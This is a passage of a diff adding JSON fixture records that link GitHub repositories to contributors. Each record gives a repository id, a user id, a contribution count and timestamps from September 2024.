"2024-09-22T06:39:44.243Z", + "nest_updated_at": "2024-09-22T18:25:59.956Z", + "contributions_count": 1, + "repository": 1135, + "user": 5923 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6568, + "fields": { + "nest_created_at": "2024-09-22T06:39:44.563Z", + "nest_updated_at": "2024-09-22T18:26:00.270Z", + "contributions_count": 1, + "repository": 1135, + "user": 5924 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6569, + "fields": { + "nest_created_at": "2024-09-22T06:39:44.883Z", + "nest_updated_at": "2024-09-22T18:26:00.591Z", + "contributions_count": 1, + "repository": 1135, + "user": 5925 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6570, + "fields": { + "nest_created_at": "2024-09-22T06:39:45.233Z", + "nest_updated_at": "2024-09-22T18:26:00.913Z", + "contributions_count": 1, + "repository": 1135, + "user": 5926 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6571, + "fields": { + "nest_created_at": "2024-09-22T06:39:48.809Z", + "nest_updated_at": "2024-09-22T18:26:04.515Z", + "contributions_count": 71, + "repository": 1136, + "user": 340 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6572, + "fields": { + "nest_created_at": "2024-09-22T06:39:52.569Z", + "nest_updated_at": "2024-09-22T18:26:08.076Z", + "contributions_count": 2, + "repository": 1137, + "user": 5927 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6573, + "fields": { + "nest_created_at": "2024-09-22T06:39:52.898Z", + "nest_updated_at": "2024-09-22T18:26:08.402Z", + "contributions_count": 1, + "repository": 1137, + "user": 5928 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6574, + "fields": { + "nest_created_at": "2024-09-22T06:39:56.532Z", + "nest_updated_at": "2024-09-22T18:26:12.104Z", + "contributions_count": 10, + "repository": 1138, + "user": 902 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6575, + "fields": { + "nest_created_at": "2024-09-22T06:39:56.864Z", + "nest_updated_at": "2024-09-22T18:26:12.416Z", + "contributions_count": 1, + "repository": 1138, + "user": 63 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6576, + "fields": { + "nest_created_at": "2024-09-22T06:40:01.579Z", + "nest_updated_at": "2024-09-22T18:26:17.134Z", + "contributions_count": 286, + "repository": 1139, + "user": 650 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6577, + "fields": { + "nest_created_at": "2024-09-22T06:40:01.900Z", + "nest_updated_at": "2024-09-22T18:26:17.449Z", + "contributions_count": 5, + "repository": 1139, + "user": 863 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6578, + "fields": { + "nest_created_at": "2024-09-22T06:40:02.215Z", + "nest_updated_at": "2024-09-22T18:26:17.761Z", + "contributions_count": 1, + "repository": 1139, + "user": 5929 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6579, + "fields": { + "nest_created_at": "2024-09-22T06:40:02.534Z", + "nest_updated_at": "2024-09-22T18:26:18.076Z", + "contributions_count": 1, + "repository": 1139, + "user": 4933 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6580, + "fields": { + "nest_created_at": "2024-09-22T06:40:02.849Z", + "nest_updated_at": "2024-09-22T18:26:18.392Z", + "contributions_count": 1, + "repository": 1139, + "user": 5930 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6581, + "fields": { + "nest_created_at": "2024-09-22T06:40:03.202Z", + "nest_updated_at": "2024-09-22T18:26:18.713Z", + "contributions_count": 1, + "repository": 1139, + "user": 5931 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6582, + "fields": { + "nest_created_at": "2024-09-22T06:40:03.527Z", + "nest_updated_at": "2024-09-22T18:26:19.021Z", + "contributions_count": 1, + "repository": 1139, + "user": 5932 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6583, + "fields": { + "nest_created_at": "2024-09-22T06:40:07.171Z", + "nest_updated_at": "2024-09-22T18:26:22.722Z", + "contributions_count": 40, + "repository": 1140, + "user": 236 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6584, + "fields": { + "nest_created_at": "2024-09-22T06:40:07.522Z", + "nest_updated_at": "2024-09-22T18:26:23.036Z", + "contributions_count": 39, + "repository": 1140, + "user": 5546 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6585, + "fields": { + "nest_created_at": "2024-09-22T06:40:07.845Z", + "nest_updated_at": "2024-09-22T18:26:23.360Z", + "contributions_count": 1, + "repository": 1140, + "user": 5933 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6586, + "fields": { + "nest_created_at": "2024-09-22T06:40:11.617Z", + "nest_updated_at": "2024-09-22T18:26:27.215Z", + "contributions_count": 189, + "repository": 1141, + "user": 340 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6587, + "fields": { + "nest_created_at": "2024-09-22T06:40:16.056Z", + "nest_updated_at": "2024-09-22T18:26:31.446Z", + "contributions_count": 44, + "repository": 1142, + "user": 270 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6588, + "fields": { + "nest_created_at": "2024-09-22T06:40:16.388Z", + "nest_updated_at": "2024-09-22T18:26:31.759Z", + "contributions_count": 17, + "repository": 1142, + "user": 249 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6589, + "fields": { + "nest_created_at": "2024-09-22T06:40:16.702Z", + "nest_updated_at": "2024-09-22T18:26:32.110Z", + "contributions_count": 6, + "repository": 1142, + "user": 340 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6590, + "fields": { + "nest_created_at": "2024-09-22T06:40:17.055Z", + "nest_updated_at": "2024-09-22T18:26:32.422Z", + "contributions_count": 2, + "repository": 1142, + "user": 651 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6591, + "fields": { + "nest_created_at": "2024-09-22T06:40:17.368Z", + "nest_updated_at": "2024-09-22T18:26:32.743Z", + "contributions_count": 1, + "repository": 1142, + "user": 4653 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6592, + "fields": { + "nest_created_at": "2024-09-22T06:40:17.687Z", + "nest_updated_at": "2024-09-22T18:26:33.055Z", + "contributions_count": 1, + "repository": 1142, + "user": 4361 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6593, + "fields": { + "nest_created_at": "2024-09-22T06:40:18.007Z", + "nest_updated_at": "2024-09-22T18:26:33.387Z", + "contributions_count": 1, + "repository": 1142, + "user": 5552 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6594, + "fields": { + "nest_created_at": "2024-09-22T06:40:18.366Z", + "nest_updated_at": "2024-09-22T18:26:33.698Z", + "contributions_count": 1, + "repository": 1142, + "user": 5934 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6595, + "fields": { + "nest_created_at": "2024-09-22T06:40:22.124Z", + "nest_updated_at": "2024-09-22T18:26:37.434Z", + "contributions_count": 2, + "repository": 1143, + "user": 5935 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6596, + "fields": { + "nest_created_at": "2024-09-22T06:40:25.747Z", + "nest_updated_at": "2024-09-22T18:26:41.036Z", + "contributions_count": 126, + "repository": 1144, + "user": 340 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6597, + "fields": { + "nest_created_at": "2024-09-22T06:40:31.484Z", + "nest_updated_at": "2024-09-22T18:26:46.685Z", + "contributions_count": 356, + "repository": 1145, + "user": 340 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6598, + "fields": { + "nest_created_at": "2024-09-22T06:40:31.803Z", + "nest_updated_at": "2024-09-22T18:26:46.992Z", + "contributions_count": 1, + "repository": 1145, + "user": 5936 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6599, + "fields": { + "nest_created_at": "2024-09-22T06:40:32.132Z", + "nest_updated_at": "2024-09-22T18:26:47.301Z", + "contributions_count": 1, + "repository": 1145, + "user": 4449 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6600, + "fields": { + "nest_created_at": "2024-09-22T06:40:35.663Z", + "nest_updated_at": "2024-09-22T18:26:50.601Z", + "contributions_count": 14, + "repository": 1146, + "user": 657 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6601, + "fields": { + "nest_created_at": "2024-09-22T06:40:39.372Z", + "nest_updated_at": "2024-09-22T18:26:54.079Z", + "contributions_count": 20, + "repository": 1147, + "user": 657 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6602, + "fields": { + "nest_created_at": "2024-09-22T06:40:42.965Z", + "nest_updated_at": "2024-09-22T18:26:57.627Z", + "contributions_count": 10, + "repository": 1148, + "user": 258 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6603, + "fields": { + "nest_created_at": "2024-09-22T06:40:43.324Z", + "nest_updated_at": "2024-09-22T18:26:57.944Z", + "contributions_count": 1, + "repository": 1148, + "user": 2365 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6604, + "fields": { + "nest_created_at": "2024-09-22T06:40:50.294Z", + "nest_updated_at": "2024-09-22T18:27:05.000Z", + "contributions_count": 65, + "repository": 1150, + "user": 818 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6605, + "fields": { + "nest_created_at": "2024-09-22T06:40:50.613Z", + "nest_updated_at": "2024-09-22T18:27:05.315Z", + "contributions_count": 1, + "repository": 1150, + "user": 3995 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6606, + "fields": { + "nest_created_at": "2024-09-22T06:40:55.856Z", + "nest_updated_at": "2024-09-22T18:27:10.610Z", + "contributions_count": 187, + "repository": 1151, + "user": 273 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6607, + "fields": { + "nest_created_at": "2024-09-22T06:40:56.168Z", + "nest_updated_at": "2024-09-22T18:27:10.917Z", + "contributions_count": 29, + "repository": 1151, + "user": 659 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6608, + "fields": { + "nest_created_at": "2024-09-22T06:40:56.494Z", + "nest_updated_at": "2024-09-22T18:27:11.226Z", + "contributions_count": 29, + "repository": 1151, + "user": 271 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6609, + "fields": { + "nest_created_at": "2024-09-22T06:40:56.817Z", + "nest_updated_at": "2024-09-22T18:27:11.570Z", + "contributions_count": 8, + "repository": 1151, + "user": 5937 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6610, + "fields": { + "nest_created_at": "2024-09-22T06:40:57.135Z", + "nest_updated_at": "2024-09-22T18:27:11.880Z", + "contributions_count": 4, + "repository": 1151, + "user": 5938 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6611, + "fields": { + "nest_created_at": "2024-09-22T06:40:57.471Z", + "nest_updated_at": "2024-09-22T18:27:12.236Z", + "contributions_count": 2, + "repository": 1151, + "user": 5939 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6612, + "fields": { + "nest_created_at": "2024-09-22T06:40:57.790Z", + "nest_updated_at": "2024-09-22T18:27:12.553Z", + "contributions_count": 2, + "repository": 1151, + "user": 5940 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6613, + "fields": { + "nest_created_at": "2024-09-22T06:40:58.111Z", + "nest_updated_at": "2024-09-22T18:27:12.910Z", + "contributions_count": 2, + "repository": 1151, + "user": 668 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6614, + "fields": { + "nest_created_at": "2024-09-22T06:40:58.432Z", + "nest_updated_at": "2024-09-22T18:27:13.221Z", + "contributions_count": 2, + "repository": 1151, + "user": 5941 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6615, + "fields": { + "nest_created_at": "2024-09-22T06:40:58.744Z", + "nest_updated_at": "2024-09-22T18:27:13.532Z", + "contributions_count": 1, + "repository": 1151, + "user": 4101 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6616, + "fields": { + "nest_created_at": "2024-09-22T06:40:59.062Z", + "nest_updated_at": "2024-09-22T18:27:13.847Z", + "contributions_count": 1, + "repository": 1151, + "user": 674 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6617, + "fields": { + "nest_created_at": "2024-09-22T06:40:59.373Z", + "nest_updated_at": "2024-09-22T18:27:14.165Z", + "contributions_count": 1, + "repository": 1151, + "user": 63 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6618, + "fields": { + "nest_created_at": "2024-09-22T06:40:59.690Z", + "nest_updated_at": "2024-09-22T18:27:14.477Z", + "contributions_count": 1, + "repository": 1151, + "user": 5942 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6619, + "fields": { + "nest_created_at": "2024-09-22T06:41:00.010Z", + "nest_updated_at": "2024-09-22T18:27:14.786Z", + "contributions_count": 1, + "repository": 1151, + "user": 5943 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6620, + "fields": { + "nest_created_at": "2024-09-22T06:41:00.321Z", + "nest_updated_at": "2024-09-22T18:27:15.102Z", + "contributions_count": 1, + "repository": 1151, + "user": 671 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6621, + "fields": { + "nest_created_at": "2024-09-22T06:41:00.635Z", + "nest_updated_at": "2024-09-22T18:27:15.414Z", + "contributions_count": 1, + "repository": 1151, + "user": 5944 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6622, + "fields": { + "nest_created_at": "2024-09-22T06:41:05.414Z", + "nest_updated_at": "2024-09-22T18:27:20.301Z", + "contributions_count": 12, + "repository": 1152, + "user": 533 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6623, + "fields": { + "nest_created_at": "2024-09-22T06:41:05.744Z", + "nest_updated_at": "2024-09-22T18:27:20.611Z", + "contributions_count": 1, + "repository": 1152, + "user": 5945 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6624, + "fields": { + "nest_created_at": "2024-09-22T06:41:06.065Z", + "nest_updated_at": "2024-09-22T18:27:20.926Z", + "contributions_count": 1, + "repository": 1152, + "user": 5946 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6625, + "fields": { + "nest_created_at": "2024-09-22T06:41:11.276Z", + "nest_updated_at": "2024-09-22T18:27:25.994Z", + "contributions_count": 51, + "repository": 1153, + "user": 5947 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6626, + "fields": { + "nest_created_at": "2024-09-22T06:41:11.608Z", + "nest_updated_at": "2024-09-22T18:27:26.312Z", + "contributions_count": 34, + "repository": 1153, + "user": 360 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6627, + "fields": { + "nest_created_at": "2024-09-22T06:41:11.925Z", + "nest_updated_at": "2024-09-22T18:27:26.632Z", + "contributions_count": 29, + "repository": 1153, + "user": 5948 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6628, + "fields": { + "nest_created_at": "2024-09-22T06:41:12.239Z", + "nest_updated_at": "2024-09-22T18:27:26.947Z", + "contributions_count": 16, + "repository": 1153, + "user": 678 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6629, + "fields": { + "nest_created_at": "2024-09-22T06:41:12.613Z", + "nest_updated_at": "2024-09-22T18:27:27.258Z", + "contributions_count": 12, + "repository": 1153, + "user": 5949 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6630, + "fields": { + "nest_created_at": "2024-09-22T06:41:12.982Z", + "nest_updated_at": "2024-09-22T18:27:27.584Z", + "contributions_count": 1, + "repository": 1153, + "user": 5950 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6631, + "fields": { + "nest_created_at": "2024-09-22T06:41:13.300Z", + "nest_updated_at": "2024-09-22T18:27:27.896Z", + "contributions_count": 1, + "repository": 1153, + "user": 5951 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6632, + "fields": { + "nest_created_at": "2024-09-22T06:41:13.616Z", + "nest_updated_at": "2024-09-22T18:27:28.260Z", + "contributions_count": 1, + "repository": 1153, + "user": 5546 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6633, + "fields": { + "nest_created_at": "2024-09-22T06:41:13.937Z", + "nest_updated_at": "2024-09-22T18:27:28.603Z", + "contributions_count": 1, + "repository": 1153, + "user": 5952 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6634, + "fields": { + "nest_created_at": "2024-09-22T06:41:18.299Z", + "nest_updated_at": "2024-09-22T18:27:32.865Z", + "contributions_count": 3, + "repository": 1154, + "user": 340 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6635, + "fields": { + "nest_created_at": "2024-09-22T06:41:18.615Z", + "nest_updated_at": "2024-09-22T18:27:33.193Z", + "contributions_count": 1, + "repository": 1154, + "user": 273 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6636, + "fields": { + "nest_created_at": "2024-09-22T06:41:23.471Z", + "nest_updated_at": "2024-09-22T19:45:05.591Z", + "contributions_count": 299, + "repository": 1155, + "user": 689 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6637, + "fields": { + "nest_created_at": "2024-09-22T06:41:23.791Z", + "nest_updated_at": "2024-09-22T19:45:05.915Z", + "contributions_count": 14, + "repository": 1155, + "user": 773 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6638, + "fields": { + "nest_created_at": "2024-09-22T06:41:24.110Z", + "nest_updated_at": "2024-09-22T19:45:06.226Z", + "contributions_count": 12, + "repository": 1155, + "user": 236 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6639, + "fields": { + "nest_created_at": "2024-09-22T06:41:24.437Z", + "nest_updated_at": "2024-09-22T19:45:06.544Z", + "contributions_count": 6, + "repository": 1155, + "user": 4936 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6640, + "fields": { + "nest_created_at": "2024-09-22T06:41:24.764Z", + "nest_updated_at": "2024-09-22T19:45:06.872Z", + "contributions_count": 3, + "repository": 1155, + "user": 770 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6641, + "fields": { + "nest_created_at": "2024-09-22T06:41:25.079Z", + "nest_updated_at": "2024-09-22T19:45:07.183Z", + "contributions_count": 2, + "repository": 1155, + "user": 5953 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6642, + "fields": { + "nest_created_at": "2024-09-22T06:41:25.403Z", + "nest_updated_at": "2024-09-22T19:45:07.496Z", + "contributions_count": 1, + "repository": 1155, + "user": 745 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6643, + "fields": { + "nest_created_at": "2024-09-22T06:41:25.788Z", + "nest_updated_at": "2024-09-22T19:45:07.838Z", + "contributions_count": 1, + "repository": 1155, + "user": 5954 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6644, + "fields": { + "nest_created_at": "2024-09-22T06:41:26.114Z", + "nest_updated_at": "2024-09-22T19:45:08.168Z", + "contributions_count": 1, + "repository": 1155, + "user": 5955 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6645, + "fields": { + "nest_created_at": "2024-09-22T06:41:26.440Z", + "nest_updated_at": "2024-09-22T19:45:08.487Z", + "contributions_count": 1, + "repository": 1155, + "user": 5956 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6646, + "fields": { + "nest_created_at": "2024-09-22T06:41:26.759Z", + "nest_updated_at": "2024-09-22T19:45:08.816Z", + "contributions_count": 1, + "repository": 1155, + "user": 5957 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6647, + "fields": { + "nest_created_at": "2024-09-22T06:41:27.092Z", + "nest_updated_at": "2024-09-22T19:45:09.152Z", + "contributions_count": 1, + "repository": 1155, + "user": 1742 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6648, + "fields": { + "nest_created_at": "2024-09-22T06:41:27.405Z", + "nest_updated_at": "2024-09-22T19:45:09.485Z", + "contributions_count": 1, + "repository": 1155, + "user": 5958 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6649, + "fields": { + "nest_created_at": "2024-09-22T06:41:27.717Z", + "nest_updated_at": "2024-09-22T19:45:09.800Z", + "contributions_count": 1, + "repository": 1155, + "user": 694 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6650, + "fields": { + "nest_created_at": "2024-09-22T06:41:28.063Z", + "nest_updated_at": "2024-09-22T19:45:10.120Z", + "contributions_count": 1, + "repository": 1155, + "user": 5959 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6651, + "fields": { + "nest_created_at": "2024-09-22T06:41:28.373Z", + "nest_updated_at": "2024-09-22T19:45:10.467Z", + "contributions_count": 1, + "repository": 1155, + "user": 5960 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6652, + "fields": { + "nest_created_at": "2024-09-22T06:41:28.683Z", + "nest_updated_at": "2024-09-22T19:45:10.809Z", + "contributions_count": 1, + "repository": 1155, + "user": 5961 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6653, + "fields": { + "nest_created_at": "2024-09-22T06:41:29.002Z", + "nest_updated_at": "2024-09-22T19:45:11.166Z", + "contributions_count": 1, + "repository": 1155, + "user": 5962 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6654, + "fields": { + "nest_created_at": "2024-09-22T06:41:29.320Z", + "nest_updated_at": "2024-09-22T19:45:11.475Z", + "contributions_count": 1, + "repository": 1155, + "user": 5963 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6655, + "fields": { + "nest_created_at": "2024-09-22T06:41:29.644Z", + "nest_updated_at": "2024-09-22T19:45:11.788Z", + "contributions_count": 1, + "repository": 1155, + "user": 5964 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6656, + "fields": { + "nest_created_at": "2024-09-22T06:41:29.965Z", + "nest_updated_at": "2024-09-22T19:45:12.118Z", + "contributions_count": 1, + "repository": 1155, + "user": 5222 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6657, + "fields": { + "nest_created_at": "2024-09-22T06:41:34.572Z", + "nest_updated_at": "2024-09-22T18:27:49.302Z", + "contributions_count": 100, + "repository": 1156, + "user": 689 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6658, + "fields": { + "nest_created_at": "2024-09-22T06:41:34.914Z", + "nest_updated_at": "2024-09-22T18:27:49.611Z", + "contributions_count": 2, + "repository": 1156, + "user": 1705 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6659, + "fields": { + "nest_created_at": "2024-09-22T06:41:35.260Z", + "nest_updated_at": "2024-09-22T18:27:49.924Z", + "contributions_count": 1, + "repository": 1156, + "user": 5965 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6660, + "fields": { + "nest_created_at": "2024-09-22T06:41:35.578Z", + "nest_updated_at": "2024-09-22T18:27:50.235Z", + "contributions_count": 1, + "repository": 1156, + "user": 4275 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6661, + "fields": { + "nest_created_at": "2024-09-22T06:41:35.899Z", + "nest_updated_at": "2024-09-22T18:27:50.543Z", + "contributions_count": 1, + "repository": 1156, + "user": 5966 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6662, + "fields": { + "nest_created_at": "2024-09-22T06:41:36.223Z", + "nest_updated_at": "2024-09-22T18:27:50.904Z", + "contributions_count": 1, + "repository": 1156, + "user": 236 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6663, + "fields": { + "nest_created_at": "2024-09-22T06:41:36.543Z", + "nest_updated_at": "2024-09-22T18:27:51.216Z", + "contributions_count": 1, + "repository": 1156, + "user": 5967 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6664, + "fields": { + "nest_created_at": "2024-09-22T06:41:36.862Z", + "nest_updated_at": "2024-09-22T18:27:51.528Z", + "contributions_count": 1, + "repository": 1156, + "user": 5968 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6665, + "fields": { + "nest_created_at": "2024-09-22T06:41:40.473Z", + "nest_updated_at": "2024-09-22T18:27:55.203Z", + "contributions_count": 2, + "repository": 1157, + "user": 5969 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6666, + "fields": { + "nest_created_at": "2024-09-22T06:41:43.972Z", + "nest_updated_at": "2024-09-22T18:27:58.925Z", + "contributions_count": 13, + "repository": 1158, + "user": 4562 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6667, + "fields": { + "nest_created_at": "2024-09-22T06:41:44.285Z", + "nest_updated_at": "2024-09-22T18:27:59.312Z", + "contributions_count": 3, + "repository": 1158, + "user": 564 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6668, + "fields": { + "nest_created_at": "2024-09-22T06:41:49.029Z", + "nest_updated_at": "2024-09-22T19:45:26.863Z", + "contributions_count": 71, + "repository": 1159, + "user": 791 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6669, + "fields": { + "nest_created_at": "2024-09-22T06:41:49.342Z", + "nest_updated_at": "2024-09-22T19:45:27.266Z", + "contributions_count": 17, + "repository": 1159, + "user": 236 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6670, + "fields": { + "nest_created_at": "2024-09-22T06:41:49.656Z", + "nest_updated_at": "2024-09-22T19:45:27.576Z", + "contributions_count": 5, + "repository": 1159, + "user": 308 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6671, + "fields": { + "nest_created_at": "2024-09-22T06:41:49.974Z", + "nest_updated_at": "2024-09-22T19:45:27.896Z", + "contributions_count": 3, + "repository": 1159, + "user": 5970 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6672, + "fields": { + "nest_created_at": "2024-09-22T06:41:50.291Z", + "nest_updated_at": "2024-09-22T19:45:28.242Z", + "contributions_count": 3, + "repository": 1159, + "user": 4190 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6673, + "fields": { + "nest_created_at": "2024-09-22T06:41:50.607Z", + "nest_updated_at": "2024-09-22T19:45:28.561Z", + "contributions_count": 2, + "repository": 1159, + "user": 5971 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6674, + "fields": { + "nest_created_at": "2024-09-22T06:41:50.944Z", + "nest_updated_at": "2024-09-22T19:45:28.874Z", + "contributions_count": 1, + "repository": 1159, + "user": 5972 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6675, + "fields": { + "nest_created_at": "2024-09-22T06:41:51.282Z", + "nest_updated_at": "2024-09-22T19:45:29.189Z", + "contributions_count": 1, + "repository": 1159, + "user": 2782 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6676, + "fields": { + "nest_created_at": "2024-09-22T06:41:51.596Z", + "nest_updated_at": "2024-09-22T19:45:29.512Z", + "contributions_count": 1, + "repository": 1159, + "user": 5973 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6677, + "fields": { + "nest_created_at": "2024-09-22T06:41:51.913Z", + "nest_updated_at": "2024-09-22T19:45:29.827Z", + "contributions_count": 1, + "repository": 1159, + "user": 5974 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6678, + "fields": { + "nest_created_at": "2024-09-22T06:41:52.290Z", + "nest_updated_at": "2024-09-22T19:45:30.147Z", + "contributions_count": 1, + "repository": 1159, + "user": 5975 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6679, + "fields": { + "nest_created_at": "2024-09-22T06:41:52.613Z", + "nest_updated_at": "2024-09-22T19:45:30.464Z", + "contributions_count": 1, + "repository": 1159, + "user": 5976 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6680, + "fields": { + "nest_created_at": "2024-09-22T06:41:55.818Z", + "nest_updated_at": "2024-09-22T18:28:10.804Z", + "contributions_count": 1, + "repository": 1160, + "user": 116 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6681, + "fields": { + "nest_created_at": "2024-09-22T06:41:59.593Z", + "nest_updated_at": "2024-09-22T18:28:14.699Z", + "contributions_count": 29, + "repository": 1161, + "user": 5977 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6682, + "fields": { + "nest_created_at": "2024-09-22T06:41:59.916Z", + "nest_updated_at": "2024-09-22T18:28:15.026Z", + "contributions_count": 1, + "repository": 1161, + "user": 5978 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6683, + "fields": { + "nest_created_at": "2024-09-22T06:42:00.264Z", + "nest_updated_at": "2024-09-22T18:28:15.343Z", + "contributions_count": 1, + "repository": 1161, + "user": 5979 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6684, + "fields": { + "nest_created_at": "2024-09-22T06:42:03.888Z", + "nest_updated_at": "2024-09-22T18:28:18.852Z", + "contributions_count": 2, + "repository": 1162, + "user": 273 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6685, + "fields": { + "nest_created_at": "2024-09-22T06:42:08.940Z", + "nest_updated_at": "2024-09-22T18:28:23.862Z", + "contributions_count": 27, + "repository": 1163, + "user": 340 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6686, + "fields": { + "nest_created_at": "2024-09-22T06:42:12.590Z", + "nest_updated_at": "2024-09-22T18:28:27.407Z", + "contributions_count": 1, + "repository": 1164, + "user": 3274 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6687, + "fields": { + "nest_created_at": "2024-09-22T06:42:16.245Z", + "nest_updated_at": "2024-09-22T18:28:30.868Z", + "contributions_count": 9, + "repository": 1165, + "user": 863 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6688, + "fields": { + "nest_created_at": "2024-09-22T06:42:16.559Z", + "nest_updated_at": "2024-09-22T18:28:31.189Z", + "contributions_count": 7, + "repository": 1165, + "user": 5980 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6689, + "fields": { + "nest_created_at": "2024-09-22T06:42:45.439Z", + "nest_updated_at": "2024-09-22T20:25:18.620Z", + "contributions_count": 812, + "repository": 1166, + "user": 322 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6690, + "fields": { + "nest_created_at": "2024-09-22T06:42:45.753Z", + "nest_updated_at": "2024-09-22T20:25:18.939Z", + "contributions_count": 367, + "repository": 1166, + "user": 236 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 6691, + "fields": { + "nest_created_at": "2024-09-22T06:42:46.072Z", + "nest_updated_at": 